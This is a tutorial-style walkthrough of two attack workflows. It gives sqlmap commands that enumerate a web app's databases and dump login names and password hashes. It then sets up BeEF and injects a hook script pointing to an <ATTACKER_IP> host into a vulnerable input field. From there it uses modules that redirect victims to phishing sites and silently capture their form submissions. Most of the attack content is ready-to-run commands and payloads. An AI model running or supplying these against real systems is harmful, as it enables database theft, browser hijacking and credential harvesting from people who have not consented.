SQL Injection Enumeration Workflow

Modern penetration testing leverages automated tools to streamline database reconnaissance. By utilizing multi-threaded requests, sqlmap efficiently identifies exposed schemas and extracts structured data.

TARGET_ENDPOINT="http://target-app.local/article/view?post_id=78"
CONCURRENT_THREADS=15

# Discover accessible databases
sqlmap -u "$TARGET_ENDPOINT" --threads=$CONCURRENT_THREADS --dbs

# Identify the currently active database context
sqlmap -u "$TARGET_ENDPOINT" --current-db

# List all tables within the 'content_db' schema
sqlmap -u "$TARGET_ENDPOINT" -D content_db --tables

# Retrieve column definitions from the 'user_profiles' table
sqlmap -u "$TARGET_ENDPOINT" -D content_db -T user_profiles --columns

# Export specified credential fields
sqlmap -u "$TARGET_ENDPOINT" -D content_db -T user_profiles -C login_name,password_hash --dump

Cross-Site Scripting (XSS) Exploitation via BeEF Framework

The Browser Exploitation Framework (BeEF) shifts the attack vector from server-side manipulation to client-side compromise. This tool hooks vulnerable browsers through crafted scripts, enabling interactive module execution.

Begin by updating the package index and deploying the necessary runtime environment:

sudo apt update
sudo apt install ruby-full beef-xss nodejs -y

Initialize the BeEF service for the first time. The application enforces credential rotation upon initial launch:

beef-xss

Upon successful initialization, the console outputs the administrative panel URI and the dynamic hook script location. Manage the daemon securely using systemd:

sudo systemctl enable beef-xss.service
sudo systemctl start beef-xss.service
sudo systemctl status beef-xss.service

Access the web interface via http://localhost:3000/ui/authentication. Supply the newly configured credentials to enter the command palette. Inject the following payload into a vulnerable input field on the target infrastructure:

<script src="http://<ATTACKER_IP>:3000/hook.js"></script>

Once the target browser connects, its session appears in the dashboard. Execute high-impact modules such as Redirect to Phishing Site to manipulate navigation flows, or utilize Pretty Theft to silently capture form submissions. Successfully harvested credentials populate the central collection pane.

Framework Configuration and Operations

Adjust authentication parameters by editing the primary configuration file. Open /etc/beef-xss/config.yaml and modify the credentials: block to define secure usernames and passwords. After saving, reload the service:

sudo systemctl restart beef-xss.service

The dashboard employs a coler-coded severity matrix to indicate module compatibility and stealth levels:

• Green: Fully executable with zero visible side effects for the victim.
• Grey: Untested against the current browser fingerprint; execution probability unknown.
• Orange: Functional but may trigger user warnings (e.g., pop-ups, unexpected redirects).
• Red: Incompatible with the detected browser version or security policies.

Common operational issues include default credential locks and dependency gaps. If the service refuses to initialize, verify that the password does not match legacy defaults. Missing geographic data triggers GeoIP warnings; resolve by executing sudo geoipupdate. JavaScript minification failures in the admin panel require a complete Node.js installation. Always operate with elevated privileges to bypass socket binding restrictions and ensure stable hook distribution.